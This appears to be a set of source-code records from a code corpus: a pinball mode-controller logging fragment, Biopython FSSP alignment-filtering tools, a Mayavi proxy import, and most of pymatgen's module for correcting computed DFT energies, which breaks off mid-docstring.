self.log.info('================ ACTIVE GAME MODES ===================')
for mode in self.active_modes:
if mode.active:
self.log.info('%s : %s', mode.name, mode.priority)
self.log.info('======================================================')
# The MIT License (MIT)
# Copyright (c) 2013-2015 Brian Madden and Gabe Knuth
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
|
spierepf/mpf
|
mpf/media_controller/core/mode_controller.py
|
Python
|
mit
| 8,091
|
[
"Brian"
] |
3fc93f167df4db270b5553103b582a8589d368700c35b93da541896dd9a0cc4c
|
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
#
import sys
# Add path to Bio
sys.path.append('../..')
from Bio import FSSP
import copy
from Bio.Align import MultipleSeqAlignment
from Bio import Alphabet
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
class FSSPAlign(MultipleSeqAlignment):
def _add_numbering_table(self, new_record):
new_record.annotations['abs2pdb'] = {}
new_record.annotations['pdb2abs'] = {}
class FSSPMultAlign(dict):
def __init__(self):
self.abs_res = []
self.pdb_res = []
self.data = {}
def mult_align(sum_dict, align_dict):
"""Returns a biopython multiple alignment instance (MultipleSeqAlignment)"""
mult_align_dict = {}
for j in align_dict.abs(1).pos_align_dict:
mult_align_dict[j] = ''
for i in range(1, len(align_dict)+1):
# loop on positions
for j in align_dict.abs(i).pos_align_dict:
# loop within a position
mult_align_dict[j] += align_dict.abs(i).pos_align_dict[j].aa
alpha = Alphabet.Gapped(Alphabet.IUPAC.extended_protein)
fssp_align = MultipleSeqAlignment([], alphabet=alpha)
for i in sorted(mult_align_dict):
fssp_align.append(SeqRecord(Seq(mult_align_dict[i], alpha),
sum_dict[i].pdb2+sum_dict[i].chain2))
return fssp_align
# Several routines used to extract information from FSSP sections
# filter:
# filters a passed summary section and alignment section according to a numeric
# attribute in the summary section. Returns new summary and alignment sections
# For example, to filter in only those records which have a zscore greater than
# 4.0 and lesser than 7.5:
# new_sum, new_align = filter(sum, align, 'zscore', 4, 7.5)
#
# Warning: this function really slows down when filtering large FSSP files.
# The reason is the use of copy.deepcopy() to copy align_dict into
# new_align_dict. I have to figure out something better.
# Took me ~160 seconds for the largest FSSP file (1reqA.fssp)
#
def filter(sum_dict, align_dict, filter_attribute, low_bound, high_bound):
"""Filters a passed summary section and alignment section according to a numeric
attribute in the summary section. Returns new summary and alignment sections"""
new_sum_dict = FSSP.FSSPSumDict()
new_align_dict = copy.deepcopy(align_dict)
# for i in align_dict:
# new_align_dict[i] = copy.copy(align_dict[i])
# new_align_dict = copy.copy(align_dict)
for prot_num in sum_dict:
attr_value = getattr(sum_dict[prot_num], filter_attribute)
if attr_value >= low_bound and attr_value <= high_bound:
new_sum_dict[prot_num] = sum_dict[prot_num]
prot_numbers = sorted(new_sum_dict)
for pos_num in new_align_dict.abs_res_dict:
new_align_dict.abs(pos_num).pos_align_dict = {}
for prot_num in prot_numbers:
new_align_dict.abs(pos_num).pos_align_dict[prot_num] = \
align_dict.abs(pos_num).pos_align_dict[prot_num]
return new_sum_dict, new_align_dict
def name_filter(sum_dict, align_dict, name_list):
"""Accepts a list of names. Returns a new Summary block and Alignment block which
contain the info only for those names passed."""
new_sum_dict = FSSP.FSSPSumDict()
new_align_dict = copy.deepcopy(align_dict)
for cur_pdb_name in name_list:
for prot_num in sum_dict:
if sum_dict[prot_num].pdb2+sum_dict[prot_num].chain2 == cur_pdb_name:
new_sum_dict[prot_num] = sum_dict[prot_num]
prot_numbers = sorted(new_sum_dict)
for pos_num in new_align_dict.abs_res_dict:
new_align_dict.abs(pos_num).pos_align_dict = {}
for prot_num in prot_numbers:
new_align_dict.abs(pos_num).pos_align_dict[prot_num] = \
align_dict.abs(pos_num).pos_align_dict[prot_num]
return new_sum_dict, new_align_dict
|
Ambuj-UF/ConCat-1.0
|
src/Utils/Bio/FSSP/FSSPTools.py
|
Python
|
gpl-2.0
| 4,027
|
[
"Biopython"
] |
9a5a8007ccbaf1602ca1d599a2e5bfcc66b460817be5c76caa6032ff834f2e25
|
# proxy module
from __future__ import absolute_import
from mayavi.tools.data_wizards.preview_window import *
|
enthought/etsproxy
|
enthought/mayavi/tools/data_wizards/preview_window.py
|
Python
|
bsd-3-clause
| 109
|
[
"Mayavi"
] |
11872d10461109fcd98ae6edd0b3f7cfb43d4418226c11d203154e1b16b606a4
|
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module implements Compatibility corrections for mixing runs of different
functionals.
"""
import abc
import os
import warnings
from collections import defaultdict
from typing import List, Optional, Sequence, Type, Union
import numpy as np
from monty.design_patterns import cached_class
from monty.json import MSONable
from monty.serialization import loadfn
from tqdm import tqdm
from uncertainties import ufloat
from pymatgen.analysis.structure_analyzer import oxide_type, sulfide_type
from pymatgen.core.periodic_table import Element
from pymatgen.entries.computed_entries import (
CompositionEnergyAdjustment,
ComputedEntry,
ComputedStructureEntry,
ConstantEnergyAdjustment,
EnergyAdjustment,
TemperatureEnergyAdjustment,
)
from pymatgen.io.vasp.sets import MITRelaxSet, MPRelaxSet
__author__ = "Amanda Wang, Ryan Kingsbury, Shyue Ping Ong, Anubhav Jain, Stephen Dacek, Sai Jayaraman"
__copyright__ = "Copyright 2012-2020, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "April 2020"
MODULE_DIR = os.path.dirname(os.path.abspath(__file__))
MU_H2O = -2.4583 # Free energy of formation of water, eV/H2O, used by MaterialsProjectAqueousCompatibility
AnyCompEntry = Union[ComputedEntry, ComputedStructureEntry]
class CompatibilityError(Exception):
"""
Exception class for Compatibility. Raised by attempting correction
on incompatible calculation
"""
class Correction(metaclass=abc.ABCMeta):
"""
A Correction class is a pre-defined scheme for correction a computed
entry based on the type and chemistry of the structure and the
calculation parameters. All Correction classes must implement a
correct_entry method.
"""
@abc.abstractmethod
def get_correction(self, entry):
"""
Returns correction and uncertainty for a single entry.
Args:
entry: A ComputedEntry object.
Returns:
The energy correction to be applied and the uncertainty of the correction.
Raises:
CompatibilityError if entry is not compatible.
"""
return
def correct_entry(self, entry):
"""
Corrects a single entry.
Args:
entry: A ComputedEntry object.
Returns:
An processed entry.
Raises:
CompatibilityError if entry is not compatible.
"""
new_corr = self.get_correction(entry)
old_std_dev = entry.correction_uncertainty
if np.isnan(old_std_dev):
old_std_dev = 0
old_corr = ufloat(entry.correction, old_std_dev)
updated_corr = new_corr + old_corr
if updated_corr.nominal_value != 0 and updated_corr.std_dev == 0:
# if there are no error values available for the corrections applied,
# set correction uncertainty to not a number
uncertainty = np.nan
else:
uncertainty = updated_corr.std_dev
entry.energy_adjustments.append(ConstantEnergyAdjustment(updated_corr.nominal_value, uncertainty))
return entry
class PotcarCorrection(Correction):
"""
Checks that POTCARs are valid within a pre-defined input set. This
ensures that calculations performed using different InputSets are not
compared against each other.
Entry.parameters must contain a "potcar_symbols" key that is a list of
all POTCARs used in the run. Again, using the example of an Fe2O3 run
using Materials Project parameters, this would look like
entry.parameters["potcar_symbols"] = ['PAW_PBE Fe_pv 06Sep2000',
'PAW_PBE O 08Apr2002'].
"""
def __init__(self, input_set, check_hash=False):
"""
Args:
input_set: InputSet object used to generate the runs (used to check
for correct potcar symbols)
check_hash (bool): If true, uses the potcar hash to check for valid
potcars. If false, uses the potcar symbol (Less reliable).
Defaults to True
Raises:
ValueError if entry do not contain "potcar_symbols" key.
CombatibilityError if wrong potcar symbols
"""
potcar_settings = input_set.CONFIG["POTCAR"]
if isinstance(list(potcar_settings.values())[-1], dict):
if check_hash:
self.valid_potcars = {k: d["hash"] for k, d in potcar_settings.items()}
else:
self.valid_potcars = {k: d["symbol"] for k, d in potcar_settings.items()}
else:
if check_hash:
raise ValueError("Cannot check hashes of potcars, since hashes are not included in the entry.")
self.valid_potcars = potcar_settings
self.input_set = input_set
self.check_hash = check_hash
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
if self.check_hash:
if entry.parameters.get("potcar_spec"):
psp_settings = {d.get("hash") for d in entry.parameters["potcar_spec"] if d}
else:
raise ValueError("Cannot check hash without potcar_spec field")
else:
if entry.parameters.get("potcar_spec"):
psp_settings = {d.get("titel").split()[1] for d in entry.parameters["potcar_spec"] if d}
else:
psp_settings = {sym.split()[1] for sym in entry.parameters["potcar_symbols"] if sym}
if {self.valid_potcars.get(str(el)) for el in entry.composition.elements} != psp_settings:
raise CompatibilityError("Incompatible potcar")
return ufloat(0.0, 0.0)
def __str__(self):
return f"{self.input_set.__name__} Potcar Correction"
@cached_class
class GasCorrection(Correction):
"""
Correct gas energies to obtain the right formation energies. Note that
this depends on calculations being run within the same input set.
Used by legacy MaterialsProjectCompatibility and MITCompatibility.
"""
def __init__(self, config_file):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
"""
c = loadfn(config_file)
self.name = c["Name"]
self.cpd_energies = c["Advanced"]["CompoundEnergies"]
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction.
"""
comp = entry.composition
correction = ufloat(0.0, 0.0)
# set error to 0 because old MPCompatibility doesn't have errors
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
rform = entry.composition.reduced_formula
if rform in self.cpd_energies:
correction += self.cpd_energies[rform] * comp.num_atoms - entry.uncorrected_energy
return correction
def __str__(self):
return f"{self.name} Gas Correction"
@cached_class
class AnionCorrection(Correction):
"""
Correct anion energies to obtain the right formation energies. Note that
this depends on calculations being run within the same input set.
Used by legacy MaterialsProjectCompatibility and MITCompatibility.
"""
def __init__(self, config_file, correct_peroxide=True):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
"""
c = loadfn(config_file)
self.oxide_correction = c["OxideCorrections"]
self.sulfide_correction = c.get("SulfideCorrections", defaultdict(float))
self.name = c["Name"]
self.correct_peroxide = correct_peroxide
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction.
"""
comp = entry.composition
if len(comp) == 1: # Skip element entry
return ufloat(0.0, 0.0)
correction = ufloat(0.0, 0.0)
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
# Check for sulfide corrections
if Element("S") in comp:
sf_type = "sulfide"
if entry.data.get("sulfide_type"):
sf_type = entry.data["sulfide_type"]
elif hasattr(entry, "structure"):
warnings.warn(sf_type)
sf_type = sulfide_type(entry.structure)
# use the same correction for polysulfides and sulfides
if sf_type == "polysulfide":
sf_type = "sulfide"
if sf_type in self.sulfide_correction:
correction += self.sulfide_correction[sf_type] * comp["S"]
# Check for oxide, peroxide, superoxide, and ozonide corrections.
if Element("O") in comp:
if self.correct_peroxide:
if entry.data.get("oxide_type"):
if entry.data["oxide_type"] in self.oxide_correction:
ox_corr = self.oxide_correction[entry.data["oxide_type"]]
correction += ox_corr * comp["O"]
if entry.data["oxide_type"] == "hydroxide":
ox_corr = self.oxide_correction["oxide"]
correction += ox_corr * comp["O"]
elif hasattr(entry, "structure"):
ox_type, nbonds = oxide_type(entry.structure, 1.05, return_nbonds=True)
if ox_type in self.oxide_correction:
correction += self.oxide_correction[ox_type] * nbonds
elif ox_type == "hydroxide":
correction += self.oxide_correction["oxide"] * comp["O"]
else:
warnings.warn(
"No structure or oxide_type parameter present. Note "
"that peroxide/superoxide corrections are not as "
"reliable and relies only on detection of special"
"formulas, e.g., Li2O2."
)
rform = entry.composition.reduced_formula
if rform in UCorrection.common_peroxides:
correction += self.oxide_correction["peroxide"] * comp["O"]
elif rform in UCorrection.common_superoxides:
correction += self.oxide_correction["superoxide"] * comp["O"]
elif rform in UCorrection.ozonides:
correction += self.oxide_correction["ozonide"] * comp["O"]
elif Element("O") in comp.elements and len(comp.elements) > 1:
correction += self.oxide_correction["oxide"] * comp["O"]
else:
correction += self.oxide_correction["oxide"] * comp["O"]
return correction
def __str__(self):
return f"{self.name} Anion Correction"
@cached_class
class AqueousCorrection(Correction):
"""
This class implements aqueous phase compound corrections for elements
and H2O.
Used only by MITAqueousCompatibility.
"""
def __init__(self, config_file, error_file=None):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
error_file: Path to the selected compatibilityErrors.yaml config file.
"""
c = loadfn(config_file)
self.cpd_energies = c["AqueousCompoundEnergies"]
# there will either be a CompositionCorrections OR an OxideCorrections key,
# but not both, depending on the compatibility scheme we are using.
# MITCompatibility only uses OxideCorrections, and hence self.comp_correction is none.
self.comp_correction = c.get("CompositionCorrections", defaultdict(float))
self.oxide_correction = c.get("OxideCorrections", defaultdict(float))
self.name = c["Name"]
if error_file:
e = loadfn(error_file)
self.cpd_errors = e.get("AqueousCompoundEnergies", defaultdict(float))
else:
self.cpd_errors = defaultdict(float)
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
from pymatgen.analysis.pourbaix_diagram import MU_H2O
comp = entry.composition
rform = comp.reduced_formula
cpdenergies = self.cpd_energies
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
correction = ufloat(0.0, 0.0)
if rform in cpdenergies:
if rform in ["H2", "H2O"]:
corr = cpdenergies[rform] * comp.num_atoms - entry.uncorrected_energy - entry.correction
err = self.cpd_errors[rform] * comp.num_atoms
correction += ufloat(corr, err)
else:
corr = cpdenergies[rform] * comp.num_atoms
err = self.cpd_errors[rform] * comp.num_atoms
correction += ufloat(corr, err)
if not rform == "H2O":
# if the composition contains water molecules (e.g. FeO.nH2O),
# correct the gibbs free energy such that the waters are assigned energy=MU_H2O
# in other words, we assume that the DFT energy of such a compound is really
# a superposition of the "real" solid DFT energy (FeO in this case) and the free
# energy of some water molecules
# e.g. that E_FeO.nH2O = E_FeO + n * g_H2O
# so, to get the most accurate gibbs free energy, we want to replace
# g_FeO.nH2O = E_FeO.nH2O + dE_Fe + (n+1) * dE_O + 2n dE_H
# with
# g_FeO = E_FeO.nH2O + dE_Fe + dE_O + n g_H2O
# where E is DFT energy, dE is an energy correction, and g is gibbs free energy
# This means we have to 1) remove energy corrections associated with H and O in water
# and then 2) remove the free energy of the water molecules
nH2O = int(min(comp["H"] / 2.0, comp["O"])) # only count whole water molecules
if nH2O > 0:
# first, remove any H or O corrections already applied to H2O in the
# formation energy so that we don't double count them
# No. of H atoms not in a water
correction -= ufloat((comp["H"] - nH2O / 2) * self.comp_correction["H"], 0.0)
# No. of O atoms not in a water
correction -= ufloat(
(comp["O"] - nH2O) * (self.comp_correction["oxide"] + self.oxide_correction["oxide"]),
0.0,
)
# next, add MU_H2O for each water molecule present
correction += ufloat(-1 * MU_H2O * nH2O, 0.0)
# correction += 0.5 * 2.46 * nH2O # this is the old way this correction was calculated
return correction
def __str__(self):
return f"{self.name} Aqueous Correction"
@cached_class
class UCorrection(Correction):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Entry.parameters must contain a "hubbards" key which is a dict
of all non-zero Hubbard U values used in the calculation. For example,
if you ran a Fe2O3 calculation with Materials Project parameters,
this would look like entry.parameters["hubbards"] = {"Fe": 5.3}
If the "hubbards" key is missing, a GGA run is assumed.
It should be noted that ComputedEntries assimilated using the
pymatgen.apps.borg package and obtained via the MaterialsProject REST
interface using the pymatgen.matproj.rest package will automatically have
these fields populated.
"""
common_peroxides = [
"Li2O2",
"Na2O2",
"K2O2",
"Cs2O2",
"Rb2O2",
"BeO2",
"MgO2",
"CaO2",
"SrO2",
"BaO2",
]
common_superoxides = ["LiO2", "NaO2", "KO2", "RbO2", "CsO2"]
ozonides = ["LiO3", "NaO3", "KO3", "NaO5"]
def __init__(self, config_file, input_set, compat_type, error_file=None):
"""
Args:
config_file: Path to the selected compatibility.yaml config file.
input_set: InputSet object (to check for the +U settings)
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
error_file: Path to the selected compatibilityErrors.yaml config file.
"""
if compat_type not in ["GGA", "Advanced"]:
raise CompatibilityError(f"Invalid compat_type {compat_type}")
c = loadfn(config_file)
self.input_set = input_set
if compat_type == "Advanced":
self.u_settings = self.input_set.CONFIG["INCAR"]["LDAUU"]
self.u_corrections = c["Advanced"]["UCorrections"]
else:
self.u_settings = {}
self.u_corrections = {}
self.name = c["Name"]
self.compat_type = compat_type
if error_file:
e = loadfn(error_file)
self.u_errors = e["Advanced"]["UCorrections"]
else:
self.u_errors = {}
def get_correction(self, entry) -> ufloat:
"""
:param entry: A ComputedEntry/ComputedStructureEntry
:return: Correction, Uncertainty.
"""
if entry.parameters.get("run_type") not in ["GGA", "GGA+U"]:
raise CompatibilityError(
f"Entry {entry.entry_id} has invalid run type {entry.parameters.get('run_type')}. Discarding."
)
calc_u = entry.parameters.get("hubbards", None)
calc_u = defaultdict(int) if calc_u is None else calc_u
comp = entry.composition
elements = sorted((el for el in comp.elements if comp[el] > 0), key=lambda el: el.X)
most_electroneg = elements[-1].symbol
correction = ufloat(0.0, 0.0)
# only correct GGA or GGA+U entries
if entry.parameters.get("run_type", None) not in ["GGA", "GGA+U"]:
return ufloat(0.0, 0.0)
ucorr = self.u_corrections.get(most_electroneg, {})
usettings = self.u_settings.get(most_electroneg, {})
uerrors = self.u_errors.get(most_electroneg, defaultdict(float))
for el in comp.elements:
sym = el.symbol
# Check for bad U values
if calc_u.get(sym, 0) != usettings.get(sym, 0):
raise CompatibilityError(f"Invalid U value of {calc_u.get(sym, 0)} on {sym}")
if sym in ucorr:
correction += ufloat(ucorr[sym], uerrors[sym]) * comp[el]
return correction
def __str__(self):
return f"{self.name} {self.compat_type} Correction"
class Compatibility(MSONable, metaclass=abc.ABCMeta):
"""
Abstract Compatibility class, not intended for direct use.
Compatibility classes are used to correct the energies of an entry or a set
of entries. All Compatibility classes must implement .get_adjustments method.
"""
@abc.abstractmethod
def get_adjustments(self, entry: AnyCompEntry) -> List[EnergyAdjustment]:
"""
Get the energy adjustments for a ComputedEntry.
This method must generate a list of EnergyAdjustment objects
of the appropriate type (constant, composition-based, or temperature-based)
to be applied to the ComputedEntry, and must raise a CompatibilityError
if the entry is not compatible.
Args:
entry: A ComputedEntry object.
Returns:
[EnergyAdjustment]: A list of EnergyAdjustment to be applied to the
Entry.
Raises:
CompatibilityError if the entry is not compatible
"""
def process_entry(self, entry: ComputedEntry) -> Optional[ComputedEntry]:
"""
Process a single entry with the chosen Corrections. Note
that this method will change the data of the original entry.
Args:
entry: A ComputedEntry object.
Returns:
An adjusted entry if entry is compatible, otherwise None is
returned.
"""
try:
return self.process_entries(entry)[0]
except IndexError:
return None
def process_entries(
self, entries: Union[AnyCompEntry, List[AnyCompEntry]], clean: bool = True, verbose: bool = False
) -> List[ComputedEntry]:
"""
Process a sequence of entries with the chosen Compatibility scheme. Note
that this method will change the data of the original entries.
Args:
entries: ComputedEntry or [ComputedEntry]
clean: bool, whether to remove any previously-applied energy adjustments.
If True, all EnergyAdjustment are removed prior to processing the Entry.
Default is True.
verbose: bool, whether to display progress bar for processing multiple entries.
Default is False.
Returns:
A list of adjusted entries. Entries in the original list which
are not compatible are excluded.
"""
# convert input arg to a list if not already
if isinstance(entries, ComputedEntry):
entries = [entries]
processed_entry_list = []
for entry in tqdm(entries, disable=(not verbose)):
ignore_entry = False
# if clean is True, remove all previous adjustments from the entry
if clean:
entry.energy_adjustments = []
# get the energy adjustments
try:
adjustments = self.get_adjustments(entry)
except CompatibilityError:
ignore_entry = True
continue
for ea in adjustments:
# Has this correction already been applied?
if (ea.name, ea.cls, ea.value) in [(ea.name, ea.cls, ea.value) for ea in entry.energy_adjustments]:
# we already applied this exact correction. Do nothing.
pass
elif (ea.name, ea.cls) in [(ea.name, ea.cls) for ea in entry.energy_adjustments]:
# we already applied a correction with the same name
# but a different value. Something is wrong.
ignore_entry = True
warnings.warn(
"Entry {} already has an energy adjustment called {}, but its "
"value differs from the value of {:.3f} calculated here. This "
"Entry will be discarded.".format(entry.entry_id, ea.name, ea.value)
)
else:
# Add the correction to the energy_adjustments list
entry.energy_adjustments.append(ea)
if not ignore_entry:
processed_entry_list.append(entry)
return processed_entry_list
@staticmethod
def explain(entry):
"""
Prints an explanation of the energy adjustments applied by the
Compatibility class. Inspired by the "explain" methods in many database
methodologies.
Args:
entry: A ComputedEntry.
"""
print(
"The uncorrected energy of {} is {:.3f} eV ({:.3f} eV/atom).".format(
entry.composition,
entry.uncorrected_energy,
entry.uncorrected_energy / entry.composition.num_atoms,
)
)
if len(entry.energy_adjustments) > 0:
print("The following energy adjustments have been applied to this entry:")
for e in entry.energy_adjustments:
print(f"\t\t{e.name}: {e.value:.3f} eV ({e.value / entry.composition.num_atoms:.3f} eV/atom)")
elif entry.correction == 0:
print("No energy adjustments have been applied to this entry.")
print(
"The final energy after adjustments is {:.3f} eV ({:.3f} eV/atom).".format(
entry.energy, entry.energy_per_atom
)
)
class CorrectionsList(Compatibility):
"""
The CorrectionsList class combines a list of corrections to be applied to
an entry or a set of entries. Note that some of the Corrections have
interdependencies. For example, PotcarCorrection must always be used
before any other compatibility. Also, AnionCorrection("MP") must be used
with PotcarCorrection("MP") (similarly with "MIT"). Typically,
you should use the specific MaterialsProjectCompatibility and
MITCompatibility subclasses instead.
"""
def __init__(self, corrections: Sequence):
"""
Args:
corrections: List of corrections to apply.
"""
self.corrections = corrections
super().__init__()
def get_adjustments(self, entry):
"""
Get the list of energy adjustments to be applied to an entry.
"""
adjustment_list = []
corrections, uncertainties = self.get_corrections_dict(entry)
for k, v in corrections.items():
if v != 0 and uncertainties[k] == 0:
uncertainty = np.nan
else:
uncertainty = uncertainties[k]
adjustment_list.append(
ConstantEnergyAdjustment(
v,
uncertainty=uncertainty,
name=k,
cls=self.as_dict(),
)
)
return adjustment_list
def get_corrections_dict(self, entry):
"""
Returns the corrections applied to a particular entry.
Args:
entry: A ComputedEntry object.
Returns:
({correction_name: value})
"""
corrections = {}
uncertainties = {}
for c in self.corrections:
val = c.get_correction(entry)
if val != 0:
corrections[str(c)] = val.nominal_value
uncertainties[str(c)] = val.std_dev
return corrections, uncertainties
def get_explanation_dict(self, entry):
"""
Provides an explanation dict of the corrections that are being applied
for a given compatibility scheme. Inspired by the "explain" methods
in many database methodologies.
Args:
entry: A ComputedEntry.
Returns:
(dict) of the form
{"Compatibility": "string",
"Uncorrected_energy": float,
"Corrected_energy": float,
"correction_uncertainty:" float,
"Corrections": [{"Name of Correction": {
"Value": float, "Explanation": "string", "Uncertainty": float}]}
"""
centry = self.process_entry(entry)
if centry is None:
uncorrected_energy = entry.uncorrected_energy
corrected_energy = None
correction_uncertainty = None
else:
uncorrected_energy = centry.uncorrected_energy
corrected_energy = centry.energy
correction_uncertainty = centry.correction_uncertainty
d = {
"compatibility": self.__class__.__name__,
"uncorrected_energy": uncorrected_energy,
"corrected_energy": corrected_energy,
"correction_uncertainty": correction_uncertainty,
}
corrections = []
corr_dict, uncer_dict = self.get_corrections_dict(entry)
for c in self.corrections:
if corr_dict.get(str(c), 0) != 0 and uncer_dict.get(str(c), 0) == 0:
uncer = np.nan
else:
uncer = uncer_dict.get(str(c), 0)
cd = {
"name": str(c),
"description": c.__doc__.split("Args")[0].strip(),
"value": corr_dict.get(str(c), 0),
"uncertainty": uncer,
}
corrections.append(cd)
d["corrections"] = corrections
return d
def explain(self, entry):
"""
Prints an explanation of the corrections that are being applied for a
given compatibility scheme. Inspired by the "explain" methods in many
database methodologies.
Args:
entry: A ComputedEntry.
"""
d = self.get_explanation_dict(entry)
print(f"The uncorrected value of the energy of {entry.composition} is {d['uncorrected_energy']:f} eV")
print(f"The following corrections / screening are applied for {d['compatibility']}:\n")
for c in d["corrections"]:
print(f"{c['name']} correction: {c['description']}\n")
print(f"For the entry, this correction has the value {c['value']:f} eV.")
if c["uncertainty"] != 0 or c["value"] == 0:
print(f"This correction has an uncertainty value of {c['uncertainty']:f} eV.")
else:
print("This correction does not have uncertainty data available")
print("-" * 30)
print(f"The final energy after corrections is {d['corrected_energy']:f}")
class MaterialsProjectCompatibility(CorrectionsList):
"""
This class implements the GGA/GGA+U mixing scheme, which allows mixing of
entries. Note that this should only be used for VASP calculations using the
MaterialsProject parameters (see pymatgen.io.vaspio_set.MPVaspInputSet).
Using this compatibility scheme on runs with different parameters is not
valid.
"""
def __init__(self, compat_type="Advanced", correct_peroxide=True, check_potcar_hash=False):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means mixing scheme is
implemented to make entries compatible with each other,
but entries which are supposed to be done in GGA+U will have the
equivalent GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. A GGA Fe oxide run
will therefore be excluded under the scheme.
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not.
check_potcar_hash (bool): Use potcar hash to verify potcars are correct.
"""
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
fp = os.path.join(MODULE_DIR, "MPCompatibility.yaml")
super().__init__(
[
PotcarCorrection(MPRelaxSet, check_hash=check_potcar_hash),
GasCorrection(fp),
AnionCorrection(fp, correct_peroxide=correct_peroxide),
UCorrection(fp, MPRelaxSet, compat_type),
]
)
@cached_class
class MaterialsProject2020Compatibility(Compatibility):
"""
This class implements the Materials Project 2020 energy correction scheme,
which incorporates uncertainty quantification and allows for mixing of GGA
and GGA+U entries (see References).
Note that this scheme should only be applied to VASP calculations that use the
Materials Project input set parameters (see pymatgen.io.vasp.sets.MPRelaxSet).
Using this compatibility scheme on calculations with different parameters is not
valid.
"""
def __init__(
self,
compat_type="Advanced",
correct_peroxide=True,
check_potcar_hash=False,
config_file=None,
):
"""
Args:
compat_type: Two options, GGA or Advanced. GGA means all GGA+U
entries are excluded. Advanced means the GGA/GGA+U mixing scheme
of Jain et al. (see References) is implemented. In this case,
entries which are supposed to be calculated in GGA+U (i.e.,
transition metal oxides and fluorides) will have the corresponding
GGA entries excluded. For example, Fe oxides should
have a U value under the Advanced scheme. An Fe oxide run in GGA
will therefore be excluded.
To use the "Advanced" type, Entry.parameters must contain a "hubbards"
key which is a dict of all non-zero Hubbard U values used in the
calculation. For example, if you ran a Fe2O3 calculation with
Materials Project parameters, this would look like
entry.parameters["hubbards"] = {"Fe": 5.3}. If the "hubbards" key
is missing, a GGA run is assumed. Entries obtained from the
MaterialsProject database will automatically have these fields
populated.
(Default: "Advanced")
correct_peroxide: Specify whether peroxide/superoxide/ozonide
corrections are to be applied or not. If false, all oxygen-containing
compounds are assigned the 'oxide' correction. (Default: True)
check_potcar_hash (bool): Use potcar hash to verify POTCAR settings are
consistent with MPRelaxSet. If False, only the POTCAR symbols will
be used. (Default: False)
config_file (Path): Path to the selected compatibility.yaml config file.
If None, defaults to `MP2020Compatibility.yaml` distributed with
pymatgen.
References:
Wang, A., Kingsbury, R., McDermott, M., Horton, M., Jain. A., Ong, S.P.,
Dwaraknath, S., Persson, K. A framework for quantifying uncertainty
in DFT energy corrections. Scientific Reports 11: 15496, 2021.
https://doi.org/10.1038/s41598-021-94550-5
Jain, A. et al. Formation enthalpies by mixing GGA and GGA + U calculations.
Phys. Rev. B - Condens. Matter Mater. Phys. 84, 1–10 (2011).
"""
if compat_type not in ["GGA", "Advanced"]:
raise CompatibilityError(f"Invalid compat_type {compat_type}")
self.compat_type = compat_type
self.correct_peroxide = correct_peroxide
self.check_potcar_hash = check_potcar_hash
# load corrections and uncertainties
if config_file:
if os.path.isfile(config_file):
self.config_file = config_file
c = loadfn(self.config_file)
else:
raise ValueError(
f"Custom MaterialsProject2020Compatibility config_file ({config_file}) does not exist."
)
else:
self.config_file = None
c = loadfn(os.path.join(MODULE_DIR, "MP2020Compatibility.yaml"))
self.name = c["Name"]
self.comp_correction = c["Corrections"].get("CompositionCorrections", defaultdict(float))
self.comp_errors = c["Uncertainties"].get("CompositionCorrections", defaultdict(float))
if self.compat_type == "Advanced":
self.u_settings = MPRelaxSet.CONFIG["INCAR"]["LDAUU"]
self.u_corrections = c["Corrections"].get("GGAUMixingCorrections", defaultdict(float))
self.u_errors = c["Uncertainties"].get("GGAUMixingCorrections", defaultdict(float))
else:
self.u_settings = {}
self.u_corrections = {}
self.u_errors = {}
def get_adjustments(self, entry: AnyCompEntry):
"""
Get the energy adjustments for a ComputedEntry or ComputedStructureEntry.
Energy corrections are implemented directly in this method instead of in
